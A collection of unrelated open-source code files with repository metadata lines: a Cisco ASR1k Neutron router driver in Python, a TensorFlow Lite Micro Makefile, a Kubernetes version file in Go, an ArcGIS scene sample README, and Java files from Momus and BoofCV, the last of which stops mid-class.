def unschedule_router_precommit(self, context, router_context):
pass
def unschedule_router_postcommit(self, context, router_context):
# When there is no longer any router with external gateway hosted on
# a hosting device, the global router on that hosting device can also
# be removed.
current = router_context.current
hd_id = current[HOSTING_DEVICE_ATTR]
if current['gw_port_id'] and hd_id is not None:
self._conditionally_remove_global_router(context.elevated(),
current)
def add_router_interface_precommit(self, context, r_port_context):
# Inside an ASR1k, VLAN sub-interfaces are used to connect to internal
# neutron networks. Only one such sub-interface can be created for each
# VLAN. As the VLAN sub-interface is added to the VRF representing the
# Neutron router, we must only allow one Neutron router to attach to a
# particular Neutron subnet/network.
if (r_port_context.router_context.current[routerrole.ROUTER_ROLE_ATTR]
== ROUTER_ROLE_HA_REDUNDANCY):
# redundancy routers can be exempt as we check the user visible
# routers and the request will be rejected there.
return
e_context = context.elevated()
if r_port_context.current is None:
sn = self._core_plugin.get_subnet(e_context,
r_port_context.current_subnet_id)
net_id = sn['network_id']
else:
net_id = r_port_context.current['network_id']
filters = {'network_id': [net_id],
'device_owner': [bc.constants.DEVICE_OWNER_ROUTER_INTF]}
for port in self._core_plugin.get_ports(e_context,
filters=filters):
router_id = port['device_id']
if router_id is None:
continue
router = self._l3_plugin.get_router(e_context, router_id)
if router[routerrole.ROUTER_ROLE_ATTR] is None:
raise TopologyNotSupportedByRouterError()
def add_router_interface_postcommit(self, context, r_port_context):
pass
def remove_router_interface_precommit(self, context, r_port_context):
pass
def remove_router_interface_postcommit(self, context, r_port_context):
pass
def create_floatingip_precommit(self, context, fip_context):
pass
def create_floatingip_postcommit(self, context, fip_context):
pass
def update_floatingip_precommit(self, context, fip_context):
pass
def update_floatingip_postcommit(self, context, fip_context):
pass
def delete_floatingip_precommit(self, context, fip_context):
pass
def delete_floatingip_postcommit(self, context, fip_context):
pass
def ha_interface_ip_address_needed(self, context, router, port,
ha_settings_db, ha_group_uuid):
if port['device_owner'] == bc.constants.DEVICE_OWNER_ROUTER_GW:
return False
else:
return True
def generate_ha_group_id(self, context, router, port, ha_settings_db,
ha_group_uuid):
if port['device_owner'] in {bc.constants.DEVICE_OWNER_ROUTER_GW,
DEVICE_OWNER_GLOBAL_ROUTER_GW}:
ri_name = self._router_name(router['id'])[8:DEV_NAME_LEN]
group_id = int(ri_name, 16) % TENANT_HSRP_GRP_RANGE
group_id += TENANT_HSRP_GRP_OFFSET
return group_id
else:
net_id_digits = port['network_id'][:6]
group_id = int(net_id_digits, 16) % EXT_HSRP_GRP_RANGE
group_id += EXT_HSRP_GRP_OFFSET
return group_id
def pre_backlog_processing(self, context):
filters = {routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
global_routers = self._l3_plugin.get_routers(context, filters=filters)
if not global_routers:
LOG.debug("There are no global routers")
return
for gr in global_routers:
filters = {
HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None]
}
invert_filters = {'gw_port_id': [None]}
num_rtrs = self._l3_plugin.get_routers_count_extended(
context, filters=filters, invert_filters=invert_filters)
LOG.debug("Global router %(name)s[%(id)s] with hosting_device "
"%(hd)s has %(num)d routers with gw_port set on that "
"device",
{'name': gr['name'], 'id': gr['id'],
'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, })
if num_rtrs == 0:
LOG.warning(
_LW("Global router:%(name)s[id:%(id)s] is present for "
"hosting device:%(hd)s but there are no tenant or "
"redundancy routers with gateway set on that hosting "
"device. Proceeding to delete global router."),
{'name': gr['name'], 'id': gr['id'],
'hd': gr[HOSTING_DEVICE_ATTR]})
self._delete_global_router(context, gr['id'])
filters = {
#TODO(bmelande): Filter on routertype of global router
#routertype.TYPE_ATTR: [routertype_id],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
log_global_routers = self._l3_plugin.get_routers(
context, filters=filters)
if log_global_routers:
log_global_router_id = log_global_routers[0]['id']
self._delete_global_router(context, log_global_router_id,
logical=True)
def post_backlog_processing(self, context):
pass
# ---------------- Create workflow functions -----------------
def _conditionally_add_global_router(self, context, tenant_router):
# We could filter on hosting device id but we don't so we get all
# global routers for this router type. We can then use that count to
# determine which ha priority a new global router should get.
filters = {
routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
global_routers = self._l3_plugin.get_routers(
context, filters=filters)
hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR]
ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
global_router = hd_to_gr_dict.get(hosting_device_id)
logical_global_router = self._get_logical_global_router(context,
tenant_router)
self._conditionally_add_auxiliary_external_gateway_port(
context, logical_global_router, ext_nw_id, tenant_router, True)
if global_router is None:
# must create global router on hosting device
global_router = self._create_global_router(
context, hosting_device_id, hd_to_gr_dict, tenant_router,
logical_global_router)
self._conditionally_add_auxiliary_external_gateway_port(
context, global_router, ext_nw_id, tenant_router)
self._l3_plugin.add_type_and_hosting_device_info(context,
global_router)
for ni in self._l3_plugin.get_notifiers(context, [global_router]):
if ni['notifier']:
ni['notifier'].routers_updated(context, ni['routers'])
def _conditionally_add_auxiliary_external_gateway_port(
self, context, global_router, ext_net_id, tenant_router,
provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
# tbe global router may or may not have an interface on the
# external network that the tenant router uses
filters = {
'device_id': [global_router['id']],
'device_owner': [port_type]}
connected_nets = {
p['network_id']: p['fixed_ips'] for p in
self._core_plugin.get_ports(context, filters=filters)}
if ext_net_id in connected_nets:
# already connected to the external network so we're done
return
else:
# not connected to the external network, so let's fix that
aux_gw_port = self._create_auxiliary_external_gateway_port(
context, global_router, ext_net_id, tenant_router, port_type)
if provision_ha:
self._provision_port_ha(context, aux_gw_port, global_router)
def _create_auxiliary_external_gateway_port(
self, context, global_router, ext_net_id, tenant_router,
port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
# When a global router is connected to an external network then a
# special type of gateway port is created on that network. Such a
# port is called auxiliary gateway ports. It has an ip address on
# each subnet of the external network. A (logical) global router
# never has a traditional Neutron gateway port.
filters = {
'device_id': [tenant_router['id']],
'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]}
# fetch the gateway port of the *tenant* router so we can determine
# the CIDR of that port's subnet
gw_port = self._core_plugin.get_ports(context,
filters=filters)[0]
fixed_ips = self._get_fixed_ips_subnets(context, gw_port)
global_router_id = global_router['id']
with context.session.begin(subtransactions=True):
aux_gw_port = self._core_plugin.create_port(context, {
'port': {
'tenant_id': '', # intentionally not set
'network_id': ext_net_id,
'mac_address': bc.constants.ATTR_NOT_SPECIFIED,
'fixed_ips': fixed_ips,
'device_id': global_router_id,
'device_owner': port_type,
'admin_state_up': True,
'name': ''}})
router_port = bc.RouterPort(
port_id=aux_gw_port['id'],
router_id=global_router_id,
port_type=port_type)
context.session.add(router_port)
return aux_gw_port
def _create_global_router(
self, context, hosting_device_id, hd_to_gr_dict, tenant_router,
logical_global_router):
r_spec = {'router': {
# global routers are not tied to any tenant
'tenant_id': '',
'name': self._global_router_name(hosting_device_id),
'admin_state_up': True}}
global_router, r_hd_b_db = self._l3_plugin.do_create_router(
context, r_spec, tenant_router[routertype.TYPE_ATTR], False,
True, hosting_device_id, ROUTER_ROLE_GLOBAL)
# make the global router a redundancy router for the logical
# global router (which we treat as a hidden "user visible
# router" (how's that for a contradiction of terms! :-) )
with context.session.begin(subtransactions=True):
ha_priority = (
ha_db.DEFAULT_MASTER_PRIORITY -
len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP)
r_b_b = ha_db.RouterRedundancyBinding(
redundancy_router_id=global_router['id'],
priority=ha_priority,
user_router_id=logical_global_router['id'])
context.session.add(r_b_b)
return global_router
def _get_logical_global_router(self, context, tenant_router):
# Since HA is also enabled on the global routers on each hosting device
# those global routers need HA settings and VIPs. We represent that
# using a Neutron router that is never instantiated/hosted. That
# Neutron router is referred to as the "logical global" router.
filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
logical_global_routers = self._l3_plugin.get_routers(
context, filters=filters)
if not logical_global_routers:
# must create logical global router
logical_global_router = self._create_logical_global_router(
context, tenant_router)
else:
logical_global_router = logical_global_routers[0]
self._update_ha_redundancy_level(context, logical_global_router, 1)
return logical_global_router
def _create_logical_global_router(self, context, tenant_router):
r_spec = {'router': {
# global routers are not tied to any tenant
'tenant_id': '',
'name': self._global_router_name('', logical=True),
'admin_state_up': True,
# set auto-schedule to false to keep this router un-hosted
routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}}
# notifications should never be sent for this logical router!
logical_global_router, r_hd_b_db = (
self._l3_plugin.do_create_router(
context, r_spec, tenant_router[routertype.TYPE_ATTR],
False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL))
with context.session.begin(subtransactions=True):
r_ha_s_db = ha_db.RouterHASetting(
router_id=logical_global_router['id'],
ha_type=cfg.CONF.ha.default_ha_mechanism,
redundancy_level=1,
priority=ha_db.DEFAULT_MASTER_PRIORITY,
probe_connectivity=False,
probe_target=None,
probe_interval=None)
context.session.add(r_ha_s_db)
return logical_global_router
def _get_fixed_ips_subnets(self, context, gw_port):
nw = self._core_plugin.get_network(context, gw_port['network_id'])
subnets = [{'subnet_id': s} for s in nw['subnets']]
return subnets
def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None):
ha_group_uuid = uuidutils.generate_uuid()
router_id = router['id']
with context.session.begin(subtransactions=True):
if ha_binding_db is None:
ha_binding_db = self._get_ha_binding(context, router_id)
group_id = self.generate_ha_group_id(
context, router,
{'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db,
ha_group_uuid)
r_ha_g = ha_db.RouterHAGroup(
id=ha_group_uuid,
tenant_id='',
ha_type=ha_binding_db.ha_type,
group_identity=group_id,
ha_port_id=ha_port['id'],
extra_port_id=None,
subnet_id=ha_port['fixed_ips'][0]['subnet_id'],
user_router_id=router_id,
timers_config='',
tracking_config='',
other_config='')
context.session.add(r_ha_g)
def _get_ha_binding(self, context, router_id):
with context.session.begin(subtransactions=True):
query = context.session.query(ha_db.RouterHASetting)
query = query.filter(
ha_db.RouterHASetting.router_id == router_id)
return query.first()
# ---------------- Remove workflow functions -----------------
def _conditionally_remove_global_router(self, context, tenant_router,
update_operation=False):
filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL],
HOSTING_DEVICE_ATTR: [tenant_router[HOSTING_DEVICE_ATTR]]}
global_routers = self._l3_plugin.get_routers(context,
filters=filters)
hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
if global_routers:
global_router_id = global_routers[0]['id']
if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]:
# let l3 plugin's periodic backlog processing take care of the
# clean up of the global router
return
ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
routertype_id = tenant_router[routertype.TYPE_ATTR]
hd_id = tenant_router[HOSTING_DEVICE_ATTR]
global_router = hd_to_gr_dict.get(hd_id)
port_deleted = self._conditionally_remove_auxiliary_gateway_port(
context, global_router_id, ext_net_id, routertype_id, hd_id,
update_operation)
if port_deleted is False:
# since no auxiliary gateway port was deleted we can
# abort no since auxiliary gateway port count cannot
# have reached zero
return
filters = {
'device_id': [global_router_id],
'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]}
num_aux_gw_ports = self._core_plugin.get_ports_count(
context, filters=filters)
if num_aux_gw_ports == 0:
# global router not needed any more so we delete it
self._delete_global_router(context, global_router_id)
do_notify = False
else:
do_notify = True
# process logical global router to remove its port
self._conditionally_remove_auxiliary_gateway_vip_port(
context, ext_net_id, routertype_id)
self._l3_plugin.add_type_and_hosting_device_info(context,
global_router)
if do_notify is True:
for ni in self._l3_plugin.get_notifiers(context,
[global_router]):
if ni['notifier']:
ni['notifier'].routers_updated(context, ni['routers'])
def _conditionally_remove_auxiliary_gateway_port(
self, context, router_id, ext_net_id, routertype_id,
hosting_device_id, update_operation=False):
num_rtrs = self._get_gateway_routers_count(
context, ext_net_id, routertype_id, None, hosting_device_id)
if ((num_rtrs <= 1 and update_operation is False) or
(num_rtrs == 0 and update_operation is True)):
# there are no tenant routers *on ext_net_id* that are serviced by
# this global router so it's aux gw port can be deleted
self._delete_auxiliary_gateway_ports(context, router_id,
ext_net_id)
return True
return False
def _conditionally_remove_auxiliary_gateway_vip_port(
self, context, ext_net_id, routertype_id):
filters = {routertype.TYPE_ATTR: [routertype_id],
routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
log_global_routers = self._l3_plugin.get_routers(context,
filters=filters)
if not log_global_routers:
return
self._update_ha_redundancy_level(context, log_global_routers[0], -1)
log_global_router_id = log_global_routers[0]['id']
num_global_rtrs = self._get_gateway_routers_count(
context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL)
if num_global_rtrs == 0:
# there are no global routers *on ext_net_id* that are serviced by
# this logical global router so it's aux gw VIP port can be deleted
self._delete_auxiliary_gateway_ports(context, log_global_router_id,
ext_net_id)
filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL]
total_num_global_rtrs = self._l3_plugin.get_routers_count(
context, filters=filters)
if total_num_global_rtrs == 0:
# there are no global routers left that are serviced by this
# logical global router so it can be deleted
self._delete_global_router(context, log_global_router_id, True)
return False
def _delete_auxiliary_gateway_ports(
self, context, router_id, net_id=None,
port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
filters = {
'device_id': [router_id],
'device_owner': [port_type]}
if net_id is not None:
filters['network_id'] = [net_id]
for port in self._core_plugin.get_ports(context, filters=filters):
try:
self._core_plugin.delete_port(context, port['id'],
l3_port_check=False)
except (exc.ObjectDeletedError, n_exc.PortNotFound) as e:
LOG.warning(e)
def _delete_global_router(self, context, global_router_id, logical=False):
# ensure we clean up any stale auxiliary gateway ports
self._delete_auxiliary_gateway_ports(context, global_router_id)
try:
if logical is True:
# We use parent class method as no special operations beyond
# what the base implemenation does are needed for logical
# global router
super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router(
context, global_router_id)
else:
self._l3_plugin.delete_router(
context, global_router_id, unschedule=False)
except (exc.ObjectDeletedError, l3.RouterNotFound) as e:
LOG.warning(e)
def _get_gateway_routers_count(self, context, ext_net_id, routertype_id,
router_role, hosting_device_id=None):
# Determine number of routers (with routertype_id and router_role)
# that act as gateway to ext_net_id and that are hosted on
# hosting_device_id (if specified).
query = context.session.query(bc.Router)
if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]:
# tenant router roles
query = query.join(models_v2.Port,
models_v2.Port.id == bc.Router.gw_port_id)
role_filter = expr.or_(
l3_models.RouterHostingDeviceBinding.role == expr.null(),
l3_models.RouterHostingDeviceBinding.role ==
ROUTER_ROLE_HA_REDUNDANCY)
else:
# global and logical global routers
query = query.join(models_v2.Port,
models_v2.Port.device_owner == bc.Router.id)
role_filter = (
l3_models.RouterHostingDeviceBinding.role == router_role)
query = query.join(
l3_models.RouterHostingDeviceBinding,
l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id)
query = query.filter(
role_filter,
models_v2.Port.network_id == ext_net_id,
l3_models.RouterHostingDeviceBinding.router_type_id ==
routertype_id)
if hosting_device_id is not None:
query = query.filter(
l3_models.RouterHostingDeviceBinding.hosting_device_id ==
hosting_device_id)
return query.count()
# ---------------- General support functions -----------------
def _update_ha_redundancy_level(self, context, logical_global_router,
delta):
with context.session.begin(subtransactions=True):
log_g_router_db = self._l3_plugin._get_router(
context, logical_global_router['id'])
log_g_router_db.ha_settings.redundancy_level += delta
context.session.add(log_g_router_db.ha_settings)
def _router_name(self, router_id):
return N_ROUTER_PREFIX + router_id
def _global_router_name(self, hosting_device_id, logical=False):
if logical is True:
return cisco_constants.LOGICAL_ROUTER_ROLE_NAME
else:
return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX,
hosting_device_id[-cisco_constants.ROLE_ID_LEN:])
@property
def _core_plugin(self):
return bc.get_plugin()
@property
def _l3_plugin(self):
return bc.get_plugin(bc.constants.L3)
| Gitweijie/first_project | networking_cisco/plugins/cisco/l3/drivers/asr1k/asr1k_routertype_driver.py | Python | apache-2.0 | 29,107 |
MAKEFILE_DIR := tensorflow/lite/experimental/micro/tools/make
# Pull in some convenience functions.
include $(MAKEFILE_DIR)/helper_functions.inc
# Try to figure out the host system
HOST_OS :=
ifeq ($(OS),Windows_NT)
HOST_OS = windows
else
UNAME_S := $(shell uname -s)
ifeq ($(UNAME_S),Linux)
HOST_OS := linux
endif
ifeq ($(UNAME_S),Darwin)
HOST_OS := osx
endif
endif
HOST_ARCH := $(shell if [[ $(shell uname -m) =~ i[345678]86 ]]; then echo x86_32; else echo $(shell uname -m); fi)
# Override these on the make command line to target a specific architecture. For example:
# make -f tensorflow/lite/Makefile TARGET=rpi TARGET_ARCH=armv7l
TARGET := $(HOST_OS)
TARGET_ARCH := $(HOST_ARCH)
# Specify TAGS on the command line to add a particular set of specialized
# implementations, for example TAGS="CMSIS disco_f746ng" to target a Discovery
# STM32F746NG board, using the CMSIS library's implementations where possible.
ALL_TAGS := $(TAGS) $(TARGET)
INCLUDES := \
-I. \
-I$(MAKEFILE_DIR)/../../../../../ \
-I$(MAKEFILE_DIR)/../../../../../../ \
-I$(MAKEFILE_DIR)/../../../../../../../ \
-I$(MAKEFILE_DIR)/downloads/ \
-I$(MAKEFILE_DIR)/downloads/gemmlowp \
-I$(MAKEFILE_DIR)/downloads/flatbuffers/include \
-I$(OBJDIR)
# This is at the end so any globally-installed frameworks like protobuf don't
# override local versions in the source tree.
INCLUDES += -I/usr/local/include
TEST_SCRIPT := tensorflow/lite/experimental/micro/testing/test_linux_binary.sh
MICROLITE_LIBS := -lm
# There are no rules for compiling objects for the host system (since we don't
# generate things like the protobuf compiler that require that), so all of
# these settings are for the target compiler.
CXXFLAGS := -O3 -DNDEBUG
CXXFLAGS += --std=c++11 -g -DTF_LITE_STATIC_MEMORY
CCFLAGS := -DNDEBUG -g -DTF_LITE_STATIC_MEMORY
LDOPTS := -L/usr/local/lib
ARFLAGS := -r
TARGET_TOOLCHAIN_PREFIX :=
CC_PREFIX :=
# This library is the main target for this makefile. It will contain a minimal
# runtime that can be linked in to other programs.
MICROLITE_LIB_NAME := libtensorflow-microlite.a
MICROLITE_TEST_SRCS := \
$(wildcard tensorflow/lite/experimental/micro/*test.cc) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*test.cc)
MICROLITE_TEST_HDRS := \
$(wildcard tensorflow/lite/experimental/micro/testing/*.h)
MICROLITE_CC_BASE_SRCS := \
$(wildcard tensorflow/lite/experimental/micro/*.cc) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*.cc) \
tensorflow/lite/c/c_api_internal.c \
tensorflow/lite/core/api/error_reporter.cc \
tensorflow/lite/core/api/flatbuffer_conversions.cc \
tensorflow/lite/core/api/op_resolver.cc \
tensorflow/lite/kernels/kernel_util.cc \
tensorflow/lite/kernels/internal/quantization_util.cc
MICROLITE_CC_SRCS := $(filter-out $(MICROLITE_TEST_SRCS), $(MICROLITE_CC_BASE_SRCS))
MICROLITE_CC_SRCS := $(call specialize,$(MICROLITE_CC_SRCS))
MICROLITE_CC_HDRS := \
$(wildcard tensorflow/lite/experimental/micro/*.h) \
$(wildcard tensorflow/lite/experimental/micro/kernels/*.h) \
LICENSE \
tensorflow/lite/c/c_api_internal.h \
tensorflow/lite/c/builtin_op_data.h \
tensorflow/lite/core/api/error_reporter.h \
tensorflow/lite/core/api/flatbuffer_conversions.h \
tensorflow/lite/core/api/op_resolver.h \
tensorflow/lite/kernels/kernel_util.h \
tensorflow/lite/kernels/op_macros.h \
tensorflow/lite/kernels/padding.h \
tensorflow/lite/kernels/internal/common.h \
tensorflow/lite/kernels/internal/compatibility.h \
tensorflow/lite/kernels/internal/reference/depthwiseconv_float.h \
tensorflow/lite/kernels/internal/reference/depthwiseconv_uint8.h \
tensorflow/lite/kernels/internal/reference/fully_connected.h \
tensorflow/lite/kernels/internal/reference/softmax.h \
tensorflow/lite/kernels/internal/round.h \
tensorflow/lite/kernels/internal/tensor_ctypes.h \
tensorflow/lite/kernels/internal/types.h \
tensorflow/lite/kernels/internal/quantization_util.h \
tensorflow/lite/schema/schema_generated.h \
tensorflow/lite/version.h
THIRD_PARTY_CC_HDRS := \
third_party/gemmlowp/fixedpoint/fixedpoint.h \
third_party/gemmlowp/fixedpoint/fixedpoint_sse.h \
third_party/gemmlowp/internal/detect_platform.h \
third_party/gemmlowp/LICENSE \
third_party/flatbuffers/include/flatbuffers/base.h \
third_party/flatbuffers/include/flatbuffers/stl_emulation.h \
third_party/flatbuffers/include/flatbuffers/flatbuffers.h \
third_party/flatbuffers/LICENSE.txt
MAKE_PROJECT_FILES := \
README_MAKE.md \
Makefile
MBED_PROJECT_FILES := \
README_MBED.md \
mbed-os.lib \
mbed_app.json
# These target-specific makefiles should modify or replace options like
# CXXFLAGS or LIBS to work for a specific targetted architecture. All logic
# based on platforms or architectures should happen within these files, to
# keep this main makefile focused on the sources and dependencies.
include $(wildcard $(MAKEFILE_DIR)/targets/*_makefile.inc)
ALL_TAGS += $(TARGET_ARCH)
ALL_SRCS := \
$(MICROLITE_CC_SRCS) \
$(MICROLITE_TEST_SRCS)
# Where compiled objects are stored.
GENDIR := $(MAKEFILE_DIR)/gen/$(TARGET)_$(TARGET_ARCH)/
OBJDIR := $(GENDIR)obj/
BINDIR := $(GENDIR)bin/
LIBDIR := $(GENDIR)lib/
PRJDIR := $(GENDIR)prj/
MICROLITE_LIB_PATH := $(LIBDIR)$(MICROLITE_LIB_NAME)
CXX := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}g++
CC := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}gcc
AR := $(CC_PREFIX)${TARGET_TOOLCHAIN_PREFIX}ar
# Load the examples.
include $(wildcard tensorflow/lite/experimental/micro/examples/*/Makefile.inc)
MICROLITE_LIB_OBJS := $(addprefix $(OBJDIR), \
$(patsubst %.cc,%.o,$(patsubst %.c,%.o,$(MICROLITE_CC_SRCS))))
MICROLITE_TEST_TARGETS := $(addprefix $(BINDIR), \
$(patsubst %_test.cc,%.test_target,$(MICROLITE_TEST_SRCS)))
# For normal manually-created TensorFlow C++ source files.
$(OBJDIR)%.o: %.cc
@mkdir -p $(dir $@)
$(CXX) $(CXXFLAGS) $(INCLUDES) -c $< -o $@
# For normal manually-created TensorFlow C source files.
$(OBJDIR)%.o: %.c
@mkdir -p $(dir $@)
$(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@
# For normal manually-created TensorFlow ASM source files.
$(OBJDIR)%.o: %.S
@mkdir -p $(dir $@)
$(CC) $(CCFLAGS) $(INCLUDES) -c $< -o $@
# The target that's compiled if there's no command-line arguments.
all: $(MICROLITE_LIB_PATH)
microlite: $(MICROLITE_LIB_PATH)
# Hack for generating schema file bypassing flatbuffer parsing
tensorflow/lite/schema/schema_generated.h:
@cp -u tensorflow/lite/schema/schema_generated.h.OPENSOURCE tensorflow/lite/schema/schema_generated.h
# Gathers together all the objects we've compiled into a single '.a' archive.
$(MICROLITE_LIB_PATH): tensorflow/lite/schema/schema_generated.h $(MICROLITE_LIB_OBJS)
@mkdir -p $(dir $@)
$(AR) $(ARFLAGS) $(MICROLITE_LIB_PATH) $(MICROLITE_LIB_OBJS)
$(BINDIR)%_test : $(OBJDIR)%_test.o $(MICROLITE_LIB_PATH)
@mkdir -p $(dir $@)
$(CXX) $(CXXFLAGS) $(INCLUDES) \
-o $@ $< \
$(LIBFLAGS) $(MICROLITE_LIB_PATH) $(LDFLAGS) $(MICROLITE_LIBS)
$(BINDIR)%.test_target: $(BINDIR)%_test
$(TEST_SCRIPT) $< '~~~ALL TESTS PASSED~~~'
# Generate standalone makefile projects for all of the test targets.
$(foreach TEST_TARGET,$(MICROLITE_TEST_SRCS),\
$(eval $(call microlite_test,$(notdir $(basename $(TEST_TARGET))),$(TEST_TARGET))))
test: test_micro_speech $(MICROLITE_TEST_TARGETS)
# Gets rid of all generated files.
clean:
rm -rf $(MAKEFILE_DIR)/gen
$(DEPDIR)/%.d: ;
.PRECIOUS: $(DEPDIR)/%.d
.PRECIOUS: $(BINDIR)%_test
-include $(patsubst %,$(DEPDIR)/%.d,$(basename $(ALL_SRCS)))
| gautam1858/tensorflow | tensorflow/lite/experimental/micro/tools/make/Makefile | Makefile | apache-2.0 | 7,400 |
# aitproject | tushargosavi/aitproject | README.md | Markdown | apache-2.0 | 12 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package version
import (
"fmt"
"os"
"runtime"
)
var (
// Version shows the version of kube batch.
Version = "Not provided."
// GitSHA shoows the git commit id of kube batch.
GitSHA = "Not provided."
// Built shows the built time of the binary.
Built = "Not provided."
)
// PrintVersionAndExit prints versions from the array returned by Info() and exit
func PrintVersionAndExit(apiVersion string) {
for _, i := range Info(apiVersion) {
fmt.Printf("%v\n", i)
}
os.Exit(0)
}
// Info returns an array of various service versions
func Info(apiVersion string) []string {
return []string{
fmt.Sprintf("API Version: %s", apiVersion),
fmt.Sprintf("Version: %s", Version),
fmt.Sprintf("Git SHA: %s", GitSHA),
fmt.Sprintf("Built At: %s", Built),
fmt.Sprintf("Go Version: %s", runtime.Version()),
fmt.Sprintf("Go OS/Arch: %s/%s", runtime.GOOS, runtime.GOARCH),
}
}
| k82cn/kube-arbitrator | pkg/version/version.go | GO | apache-2.0 | 1,456 |
# Display a scene
Display a scene with a terrain surface and some imagery.

## Use case
Scene views are 3D representations of real-world areas and objects. Scene views are helpful for visualizing complex datasets where 3D relationships, topography, and elevation of elements are important factors.
## How to use the sample
When loaded, the sample will display a scene. Pan and zoom to explore the scene.
## How it works
1. Create a `Scene` object with a basemap using the `BasemapImageryWithLabels`.
2. Create an `ArcGISTiledElevationSource` object and add it to the scene's base surface.
3. Create a `SceneView` object to display the map.
4. Set the scene to the scene view.
## Relevant API
* ArcGISTiledElevationSource
* Scene
* SceneView
## Tags
3D, basemap, elevation, scene, surface
| Esri/arcgis-runtime-samples-qt | ArcGISRuntimeSDKQt_QMLSamples/Scenes/BasicSceneView/README.md | Markdown | apache-2.0 | 819 |
package no.dusken.momus.model.websocket;
public enum Action {
CREATE, UPDATE, DELETE
} | Studentmediene/Momus | src/main/java/no/dusken/momus/model/websocket/Action.java | Java | apache-2.0 | 91 |
/*
* Copyright (c) 2021, Peter Abeles. All Rights Reserved.
*
* This file is part of BoofCV (http://boofcv.org).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package boofcv.demonstrations.imageprocessing;
import boofcv.abst.distort.FDistort;
import boofcv.alg.filter.kernel.GKernelMath;
import boofcv.alg.filter.kernel.SteerableKernel;
import boofcv.alg.misc.GImageStatistics;
import boofcv.core.image.GeneralizedImageOps;
import boofcv.gui.ListDisplayPanel;
import boofcv.gui.SelectAlgorithmPanel;
import boofcv.gui.image.VisualizeImageData;
import boofcv.struct.convolve.Kernel2D;
import boofcv.struct.image.ImageGray;
import javax.swing.*;
import java.awt.*;
import java.awt.image.BufferedImage;
import java.util.ArrayList;
import java.util.List;
/**
* Visualizes steerable kernels.
*
* @author Peter Abeles
*/
public abstract class DisplaySteerableBase<T extends ImageGray<T>, K extends Kernel2D>
extends SelectAlgorithmPanel {
protected static int imageSize = 400;
protected static int radius = 100;
protected Class<T> imageType;
protected Class<K> kernelType;
ListDisplayPanel basisPanel = new ListDisplayPanel();
ListDisplayPanel steerPanel = new ListDisplayPanel();
T largeImg;
List<DisplayGaussianKernelApp.DerivType> order = new ArrayList<>();
protected DisplaySteerableBase( Class<T> imageType, Class<K> kernelType ) {
this.imageType = imageType;
this.kernelType = kernelType;
largeImg = GeneralizedImageOps.createSingleBand(imageType, imageSize, imageSize);
addAlgorithm("Deriv X", new DisplayGaussianKernelApp.DerivType(1, 0));
addAlgorithm("Deriv XX", new DisplayGaussianKernelApp.DerivType(2, 0));
addAlgorithm("Deriv XXX", new DisplayGaussianKernelApp.DerivType(3, 0));
addAlgorithm("Deriv XXXX", new DisplayGaussianKernelApp.DerivType(4, 0));
addAlgorithm("Deriv XY", new DisplayGaussianKernelApp.DerivType(1, 1));
addAlgorithm("Deriv XXY", new DisplayGaussianKernelApp.DerivType(2, 1));
addAlgorithm("Deriv XYY", new DisplayGaussianKernelApp.DerivType(1, 2));
addAlgorithm("Deriv XXXY", new DisplayGaussianKernelApp.DerivType(3, 1));
addAlgorithm("Deriv XXYY", new DisplayGaussianKernelApp.DerivType(2, 2));
